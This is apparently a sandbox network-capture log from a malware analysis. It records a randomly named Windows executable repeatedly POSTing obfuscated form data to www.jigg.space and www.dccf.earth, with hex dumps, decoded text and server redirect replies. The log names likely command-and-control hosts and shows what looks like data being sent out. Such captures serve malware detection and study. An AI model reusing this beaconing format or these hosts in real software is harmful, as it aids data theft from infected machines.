37 58 37 78 64 6d 6c 39 37 48 56 38 54 43 4a 54 44 63 68 6d 4c 78 2b 52 2b 6f 4a 4a 32 6c 4d 78 6e 63 38 67 57 6f 2f 62 31 64 4d 31 76 53 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?CR=QnXHBNIHO&C4NDALSx=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ0j57X7xdml97HV8TCJTDchmLx+R+oJJ2lMxnc8gWo/b1dM1vSs="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50011	45.33.30.197	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:57.599123001 CET	735	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 48 7a 69 57 38 6b 45 49 32 52 53 77 52 46 77 30 48 79 6a 4d 44 79 4e 53 33 44 4c 34 54 31 51 6e 4e 62 36 54 30 35 78 72 42 31 37 69 56 75 6a 4d 5a 2f 74 36 6f 68 2b 53 79 49 78 31 75 48 62 54 55 56 2f 59 39 4c 4b 62 34 34 79 79 6d 7a 31 71 7a 6a 48 79 41 34 78 62 4e 6f 2b 69 30 50 64 41 5a 58 71 49 44 51 4e 44 70 61 68 52 4a 4f 46 2f 7a 4a 34 35 4c 36 73 4f 74 72 6c 42 2b 47 33 52 56 37 52 64 35 5a 74 79 4a 6f 6d 49 37 2f 33 52 58 2f 48 79 6f 2b 41 56 62 2b 6b 70 71 49 4b 6c 65 39 44 49 67 4b 73 73 62 70 55 31 48 54 54 4a 62 46 4f 31 59 51 70 48 57 52 46 50 66 55 44 34 Data Ascii: C4NDALSx=QSLmiGTBaO1LHziW8kEI2RSwRFw0HyjMDyNS3DL4T1QnNb6T05xrB17iVujMZ/t6oh+SyIx1uHbTUV/Y9LKb44yymz1qzjHyA4xbNo+i0PdAZXqIDQNDpahRJOF/zJ45L6sOtrlB+G3RV7Rd5ZtyJomI7/3RX/Hyo+AVb+kpqIKle9DIgKssbpU1HTTJbFO1YQpHWRFPfUD4
Nov 4, 2024 04:18:58.184942007 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 04 Nov 2024 03:18:58 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 6c ec d8 6e 20 9d d8 8d b1 5d 27 4e 9c 0f 30 97 8c 90 14 4b 44 48 14 04 d8 e9 f4 bf 17 4c 27 a6 e3 1e ba 07 49 bb da 7d bb fb 56 b2 3e 7c 5b 8e 1f d6 b7 57 0a 91 11 bb 38 b1 aa 4d 61 80 6f 6c 15 73 f5 e2 44 29 c5 22 18 a0 fa b8 57 23 2c 81 02 09 48 52 2c 6d f5 f1 61 d2 1a fc f1 3c 5c 13 29 e3 16 fe 91 d1 dc 56 b7 ad 0c b4 a0 88 62 20 69 c0 b0 aa 40 c1 25 e6 65 ec ec ca c6 68 83 8f a2 39 88 b0 ad e6 14 17 b1 48 64 23 a0 a0 48 12 1b e1 9c 42 dc da 2b 9f 15 ca a9 a4 80 b5 52 08 18 b6 db 9a d1 84 93 54 32 7c 61 e9 f5 be 6f 67 5f 24 17 29 4c 68 2c 0f 6d fd bb f6 04 bf 24 38 25 8d 12 8c f3 2c 61 76 d5 df 17 5d 2f 8a a2 6f 68 21 dd 6c b4 34 06 10 eb aa a2 1f 20 2d fd 38 8d b5 67 af 49 cf 71 8a de ff a5 b0 f4 c3 60 ac 40 a0 9d 22 38 13 00 d9 2a 12 cf f5 f1 e3 a7 26 19 75 cb 8a dc c5 25 bb 12 6f a5 1e 82 1c d4 d6 86 5f c5 c4 4b c6 a1 a4 82 2b 0d 28 e5 e7 3b 7f 95 4b 25 05 e5 48 14 9a 14 b1 c6 04 2c e7 2b b8 46 ca 86 [TRUNCATED] Data Ascii: 265SMs0WPvln ]'N0KDHL'I}V>\|[W8MaolsD)"W#,HR,ma<\)Vb i@%eh9Hd#HB+RT2\|aog_$)Lh,m$8%,av]/oh!l4 -8gIq`@"8&u%o_K+(;K%H,+F[Q5o$iKQdq64LsA$3H6w6^^E8]/s6ht#(9"c{5{b3+w9d08!ay@.[koT:;ti^ar"L:]myQ6:={(8pQwHIVQoun>TwORt}590

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50012	45.33.30.197	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:00.149600983 CET	759	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 47 57 79 57 2f 44 6f 49 7a 78 53 33 49 31 77 30 64 43 69 46 44 79 42 53 33 43 2f 6f 51 47 30 6e 4e 36 4b 54 31 38 46 72 52 6c 37 69 65 4f 6a 4e 58 66 74 39 6f 67 44 76 79 4e 52 31 75 48 50 54 55 55 50 59 38 38 2b 61 34 6f 79 73 76 54 31 6f 2b 44 48 79 41 34 78 62 4e 6f 71 4d 30 50 56 41 61 6d 61 49 52 6a 56 41 6b 36 68 51 42 75 46 2f 33 4a 35 52 4c 36 74 5a 74 71 70 2f 2b 45 2f 52 56 35 35 64 35 4d 42 78 41 6f 6d 43 6c 50 32 68 47 4d 6d 75 78 34 4a 69 54 4e 67 6c 2b 70 36 5a 66 4c 65 53 38 35 73 50 4a 35 30 33 48 52 4c 37 62 6c 4f 66 61 51 52 48 45 47 4a 6f 51 67 6d 62 75 32 4f 37 36 33 64 71 5a 59 4d 58 73 79 64 6c 6c 2b 48 66 50 77 3d 3d Data Ascii: C4NDALSx=QSLmiGTBaO1LGWyW/DoIzxS3I1w0dCiFDyBS3C/oQG0nN6KT18FrRl7ieOjNXft9ogDvyNR1uHPTUUPY88+a4oysvT1o+DHyA4xbNoqM0PVAamaIRjVAk6hQBuF/3J5RL6tZtqp/+E/RV55d5MBxAomClP2hGMmux4JiTNgl+p6ZfLeS85sPJ503HRL7blOfaQRHEGJoQgmbu2O763dqZYMXsydll+HfPw==
Nov 4, 2024 04:19:00.730921984 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 04 Nov 2024 03:19:00 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 2e b6 93 b8 81 74 62 1a df ea c4 89 73 c1 f0 92 11 92 82 44 84 44 41 80 9d 4e ff bd 18 3a 31 1d f7 a1 7a 40 da 65 f7 9c dd b3 92 f5 e1 db d2 79 f0 6e af 14 22 63 76 71 64 ed 36 85 01 1e da 2a e6 ea c5 91 52 2d 8b 60 80 9a 63 6d c6 58 02 05 12 90 66 58 da ea e3 c3 b8 73 f6 27 72 ff 9b 48 99 74 f0 8f 9c 16 b6 ba e9 e4 a0 03 45 9c 00 49 03 86 55 05 0a 2e 31 af 72 67 57 36 46 21 3e c8 e6 20 c6 b6 5a 50 5c 26 22 95 ad 84 92 22 49 6c 84 0b 0a 71 a7 36 3e 2b 94 53 49 01 eb 64 10 30 6c 1b 5d bd 0d 27 a9 64 f8 c2 d2 9a bd 6e a7 2e 92 8b 0c a6 34 91 fb b6 fe 5d 7b 8a 5f 52 9c 91 56 09 fa 79 9e 32 7b d7 df 17 4d 2b cb f2 54 ef 46 34 0c bb 59 02 20 d6 54 45 db 43 5a da 21 8d 55 ab d7 96 e7 90 62 f0 7f 14 96 b6 1f 8c 15 08 b4 55 04 67 02 20 5b 45 e2 b9 39 7e fc d4 16 a3 69 59 91 db a4 52 57 e2 8d d4 22 50 80 c6 db 8a db 29 f1 92 73 28 a9 e0 4a 0b 4a f9 f9 ae df 2e 64 b7 4a ca 91 28 bb 52 24 5d 26 60 35 5f c1 bb a4 6a 48 [TRUNCATED] Data Ascii: 265Sr0}WP2Lm.tbsDDAN:1z@eyn"cvqd6R-`cmXfXs'rHtEIU.1rgW6F!> ZP\&""Ilq6>+SId0l]'dn.4]{_RVy2{M+TF4Y TECZ!UbUg [E9~iYRW"P)s(JJ.dJ(R$]&`5_jHu/Q[ FabQV}"8'C>C4c!NAf6%Ltp.sYm)s7h@=[I0_'"?kp_Y$_1<+t%gCt+:7~22[xbd&=96U+^d>Qls~Hd(Grsp/9rD`2+S_nYZ[T/]_oln0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50013	45.33.30.197	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:02.691003084 CET	1772	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 47 57 79 57 2f 44 6f 49 7a 78 53 33 49 31 77 30 64 43 69 46 44 79 42 53 33 43 2f 6f 51 47 38 6e 4e 4d 65 54 31 62 5a 72 44 31 37 69 54 75 6a 49 58 66 74 73 6f 67 61 6b 79 4e 64 36 75 45 33 54 55 32 48 59 30 70 53 61 68 59 79 73 77 44 31 70 7a 6a 47 77 41 34 68 66 4e 6f 36 4d 30 50 56 41 61 6c 43 49 53 77 4e 41 33 71 68 52 4a 4f 46 6a 7a 4a 35 71 4c 36 46 4a 74 71 38 4b 2b 31 66 52 56 5a 70 64 2b 36 31 78 42 49 6d 4d 6b 50 32 35 47 4d 71 48 78 35 67 5a 54 4f 39 49 2b 71 6d 5a 53 64 6a 7a 73 63 4d 4b 56 76 64 61 45 43 50 41 65 55 76 72 63 57 6f 36 45 30 4a 79 58 69 36 62 69 6a 43 30 76 46 42 6f 54 5a 49 2b 6e 45 70 75 75 63 57 58 54 42 42 68 64 2f 62 71 74 42 67 57 74 68 62 64 30 59 37 50 53 35 56 34 38 2f 6b 5a 73 69 57 74 4d 6c 79 7a 75 4c 68 46 6e 56 79 7a 7a 42 54 79 52 52 4a 67 46 4e 54 6e 69 2f 59 4e 49 6a 34 47 66 45 6c 31 41 48 67 79 54 64 34 59 74 41 32 4d 71 56 34 50 38 55 46 70 52 6f 59 53 32 58 71 69 37 65 31 72 79 61 48 6e 74 [TRUNCATED] Data Ascii: C4NDALSx=QSLmiGTBaO1LGWyW/DoIzxS3I1w0dCiFDyBS3C/oQG8nNMeT1bZrD17iTujIXftsogakyNd6uE3TU2HY0pSahYyswD1pzjGwA4hfNo6M0PVAalCISwNA3qhRJOFjzJ5qL6FJtq8K+1fRVZpd+61xBImMkP25GMqHx5gZTO9I+qmZSdjzscMKVvdaECPAeUvrcWo6E0JyXi6bijC0vFBoTZI+nEpuucWXTBBhd/bqtBgWthbd0Y7PS5V48/kZsiWtMlyzuLhFnVyzzBTyRRJgFNTni/YNIj4GfEl1AHgyTd4YtA2MqV4P8UFpRoYS2Xqi7e1ryaHntxXReSY2kSbF518g2yXyrIIvQQm2Xuo0TKqAoJWc/Grc1gd3h3Pz83qZ3FFqu97hd4PmHiGBFOe2gdzczzaTsdK9d+t73Zot5ATyhgtwkVMlMAvPtQ27C1DqR6PowwUZrNwe8B1cth6iwtW42d6ldEuJqWC5q4gNjY0a84hLoJL2M6ZwxljeUt4wnMkDX7SJFclWjNoGzdWxgUbgtMyu238poAm2ba8MmwtiqN+kZ13rwoJO9p+YRXwefmrRA9nifPmrXNEAl9UBgXay3NUom2XrvH6cVQZRpq8rcpAm40X+QZO2dIn9W6JmoaitXtR5R71C00xcy4vu2WCv2TFZX//mrtb4odZJzSP/AxnaoiZ4bs4ED1L03c4dpr2dN2bF5UfQ/Znn2wBk7icMHWdIyL+HZuPEVU1vHqMyOkaUNOskCUhQ3E89dbj7Jwzpa7KZfu7gsMtGyISAq4lelq6vrMYr1LLH7mvfU1dvx/prH8aSAYQi9Tbgp88V3zGEHjmW2boQKHza+ffnPOLv614eQYQ/CWwFUMesSInAgQXEurteUZNVa/E6pPi5S/OpcGZTx93P/H1h7G+pxC3dXPF4MoBTahrgNAxvU5nBsVlCW0eu5gp0joIR/t39SnxlTrKCq5zzfrbA1iu87wyRuKVcpBgywT6C8pOVe26 [TRUNCATED]
Nov 4, 2024 04:19:03.283235073 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 04 Nov 2024 03:19:03 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 da 30 10 bd e7 57 b8 3e 64 da 99 82 bf 20 40 63 a7 13 68 30 50 12 12 f2 61 f0 25 23 4b 8a 25 47 96 5c 5b b6 21 9d fe f7 1a dc 09 ee d0 43 75 b0 b4 eb dd f7 76 df 4a f6 87 6f 8b d1 c3 fa f6 4a 21 32 66 17 27 f6 6e 53 18 e0 a1 a3 62 ae 5e 9c 28 d5 b2 09 06 a8 3e ee cd 18 4b a0 40 02 d2 0c 4b 47 7d 7c 18 b7 fa 7f 22 0f bf 89 94 49 0b ff c8 69 e1 a8 9b 56 0e 5a 50 c4 09 90 34 60 58 55 a0 e0 12 f3 2a 77 7a e5 60 14 e2 a3 6c 0e 62 ec a8 05 c5 65 22 52 d9 48 28 29 92 c4 41 b8 a0 10 b7 f6 c6 67 85 72 2a 29 60 ad 0c 02 86 1d a3 ad 37 e1 24 95 0c 5f d8 5a bd ef db d9 17 c9 45 06 53 9a c8 43 5b ff ae 3d c5 2f 29 ce 48 a3 04 fd 3c 4f 99 b3 eb ef 8b a6 95 65 d9 d3 db 11 0d c3 76 96 00 88 35 55 d1 0e 90 b6 76 4c 63 ef d5 6b ca 73 4c d1 fd 3f 0a 5b 3b 0c c6 0e 04 da 2a 82 33 01 90 a3 22 f1 5c 1f 3f 7e 6a 8a 51 b7 ac c8 6d 52 a9 2b f1 46 6a 11 28 40 ed 6d c4 ed 94 78 c9 39 94 54 70 a5 01 a5 fc 7c d7 6f 17 b2 5b 25 e5 48 94 6d 29 92 36 13 b0 9a af e0 6d 52 35 [TRUNCATED] Data Ascii: 266SMs0W>d @ch0Pa%#K%G\[!CuvJoJ!2f'nSb^(>K@KG}\|"IiVZP4`XUwz`lbe"RH()Agr)`7$_ZESC[=/)H<Oev5UvLcksL?[;3"\?~jQmR+Fj(@mx9Tp\|o[%Hm)6mR58z)~#0q(>yNc,l[av~THg3tA/\|:NK^8NSfo&dY.h@q&5$kW5w>D8K'w,e08f!eE@/;Wf\W$0;vla]Ger!67&AO6I? H#}oCIE""^97@=k:-[k^u[kN4-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50014	45.33.30.197	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:05.232106924 CET	483	OUT	GET /ezhm/?C4NDALSx=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4LeGomdb6yirOaA+C9WTgdNIW32ObChxobUuNb9d8YJ7EaJFlMM=&CR=QnXHBNIHO HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:19:05.825795889 CET	1236	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 04 Nov 2024 03:19:05 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6a 69 67 67 2e 73 70 [TRUNCATED] Data Ascii: 4B1<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.jigg.space/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.jigg.space/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.jigg.space/ezhm?gp=1&js=1&uuid=1730690345.0000715743&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiYXJncyI6ICJDNE5EQUxTeD1kUWpHaHhYTUh2NStZd2pyeVFjSnJ5U2tPR0lsUnlUVEFteEp4UUxaVVJGVEVaVGoxWUpSWFh5elVmelNVdUJUOEFXUzZmNVV6M3ZiWFYvRzhZT2Y0TGVHb21kYjZ5aXJPYUErQzlXVGdkTklXMzJPYkNoeG9iVXVOYjlkOFlKN0VhSkZsTU09JkNSPVFuWEhCTklITyIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxh [TRUNCATED]
Nov 4, 2024 04:19:05.825999975 CET	133	IN	Data Raw: 62 6d 63 73 4b 69 38 71 4f 33 45 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 35 6e 5a 54 74 32 50 57 49 7a 4f 33 45 39 4d 43 34 33 49 6e 30 3d 22 3b 0a 20 20 20 20 20 20 20 Data Ascii: bmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50015	3.33.130.190	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:10.884768009 CET	735	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 71 43 78 50 53 78 69 79 41 65 32 4a 4c 78 64 6e 44 4d 79 32 39 64 65 76 76 6f 75 4b 6f 67 48 47 33 44 51 4c 49 46 69 58 2b 34 37 2b 52 2f 44 4f 52 59 33 58 70 71 2f 75 31 71 69 48 4b 78 2b 64 68 54 38 6b 34 34 6e 72 43 48 4c 49 64 43 39 44 49 70 65 33 68 4a 65 54 73 2f 4c 49 44 66 66 62 78 41 38 75 49 6b 64 5a 64 58 66 62 4b 6c 7a 47 56 57 69 69 48 44 56 7a 43 4e 6f 75 6e 79 65 69 75 52 4b 53 63 6e 76 77 50 47 52 31 6d 50 5a 45 69 6a 4e 6c 2b 73 5a 7a 62 4e 4d 56 2b 4e 78 67 71 71 61 32 66 77 6f 2b 66 38 56 68 2b 76 61 6b 57 61 48 4a 75 4d 4b 7a 4e 35 66 44 65 5a 57 73 Data Ascii: C4NDALSx=JmLCViI5qPpMqCxPSxiyAe2JLxdnDMy29devvouKogHG3DQLIFiX+47+R/DORY3Xpq/u1qiHKx+dhT8k44nrCHLIdC9DIpe3hJeTs/LIDffbxA8uIkdZdXfbKlzGVWiiHDVzCNounyeiuRKScnvwPGR1mPZEijNl+sZzbNMV+Nxgqqa2fwo+f8Vh+vakWaHJuMKzN5fDeZWs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50016	3.33.130.190	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:13.424403906 CET	759	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 34 79 42 50 55 57 32 79 49 65 32 47 48 52 64 6e 4a 73 79 79 39 64 61 76 76 70 72 58 6f 53 7a 47 75 6e 55 4c 61 77 43 58 35 34 37 2b 65 66 44 50 66 34 33 4a 70 71 44 4d 31 72 65 48 4b 78 71 64 68 53 4d 6b 34 4a 6e 6f 44 58 4c 4b 62 43 39 57 4c 5a 65 33 68 4a 65 54 73 2f 65 6a 44 63 76 62 79 77 73 75 61 52 39 61 55 33 66 55 50 6c 7a 47 44 6d 69 6d 48 44 55 51 43 49 78 31 6e 77 6d 69 75 51 36 53 64 31 48 78 42 47 52 33 72 76 59 76 71 43 30 64 36 64 74 30 61 65 5a 79 6d 75 78 6f 72 63 48 73 44 44 6f 64 4e 73 31 6a 2b 74 43 57 57 36 48 6a 73 4d 79 7a 66 75 54 6b 52 74 7a 50 4a 2b 71 56 62 35 74 5a 6b 47 54 7a 46 7a 65 75 38 54 74 73 6c 77 3d 3d Data Ascii: C4NDALSx=JmLCViI5qPpM4yBPUW2yIe2GHRdnJsyy9davvprXoSzGunULawCX547+efDPf43JpqDM1reHKxqdhSMk4JnoDXLKbC9WLZe3hJeTs/ejDcvbywsuaR9aU3fUPlzGDmimHDUQCIx1nwmiuQ6Sd1HxBGR3rvYvqC0d6dt0aeZymuxorcHsDDodNs1j+tCWW6HjsMyzfuTkRtzPJ+qVb5tZkGTzFzeu8Ttslw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50017	3.33.130.190	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:15.974008083 CET	1772	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 34 79 42 50 55 57 32 79 49 65 32 47 48 52 64 6e 4a 73 79 79 39 64 61 76 76 70 72 58 6f 53 4c 47 79 45 4d 4c 4c 6d 4b 58 34 34 37 2b 58 2f 44 4b 66 34 32 4d 70 71 62 49 31 72 53 39 4b 31 61 64 67 77 45 6b 2b 39 4c 6f 4d 58 4c 4b 57 69 38 78 49 70 65 59 68 4b 33 37 73 2f 4f 6a 44 63 76 62 79 32 67 75 4b 55 64 61 59 58 66 62 4b 6c 7a 30 56 57 69 65 48 41 6b 75 43 49 38 41 6e 68 47 69 76 77 71 53 65 47 76 78 65 57 52 35 75 76 59 33 71 44 49 43 36 64 41 4e 61 64 45 58 6d 73 74 6f 72 62 43 78 66 68 68 4b 63 64 4a 2f 74 39 61 72 59 38 50 58 6d 4e 4b 71 54 76 44 6a 65 59 58 47 47 5a 36 44 55 66 6b 69 71 32 47 5a 43 46 50 6e 79 51 51 59 35 4f 72 37 5a 35 6a 73 38 75 59 55 4f 58 56 39 73 71 66 6b 52 51 5a 2b 54 36 65 70 77 67 63 74 33 55 78 6b 55 61 71 75 77 75 75 38 75 38 75 43 67 41 58 68 53 68 5a 4d 44 61 44 2b 77 64 75 58 45 4d 73 37 61 30 79 7a 55 79 69 57 59 66 7a 35 2f 41 4e 64 4f 43 73 35 4a 35 6c 63 47 77 48 47 73 63 4d 38 42 4f 52 75 43 [TRUNCATED] Data Ascii: C4NDALSx=JmLCViI5qPpM4yBPUW2yIe2GHRdnJsyy9davvprXoSLGyEMLLmKX447+X/DKf42MpqbI1rS9K1adgwEk+9LoMXLKWi8xIpeYhK37s/OjDcvby2guKUdaYXfbKlz0VWieHAkuCI8AnhGivwqSeGvxeWR5uvY3qDIC6dANadEXmstorbCxfhhKcdJ/t9arY8PXmNKqTvDjeYXGGZ6DUfkiq2GZCFPnyQQY5Or7Z5js8uYUOXV9sqfkRQZ+T6epwgct3UxkUaquwuu8u8uCgAXhShZMDaD+wduXEMs7a0yzUyiWYfz5/ANdOCs5J5lcGwHGscM8BORuC3SCYa1CjEpRPRJnnu//T/wP8BN1H6l2jAAL186weBqEKFmrs5kdMzgtk3Dh73cGuHRqq8VmfBEdPnlrcpziTdyw/WYz+XUlytks/sdDv0La87aF5Ss0EsSx6pyON5+2kBUH623R9tYUi+gHAg+TStW9ECgqKMABy7n+VtC3xxyb/QqNeobkbNYBySxjWrhxCODWmY82tWqoLDFpmhBs7qzTjSvFXQUjO04xylA9tgKldIMRSM12FhFvRS/abYAS1tDVul9poEVXnqJI68eWvjg/dsFeKsBbgaT35GzarpE1FkUPUy36iBJMUTVa9pbghAo8zmLBA1mQNRzBse2nPwXHg45XBmQDL0TDzU9fbl+SzeAw9vSGusLgAYvu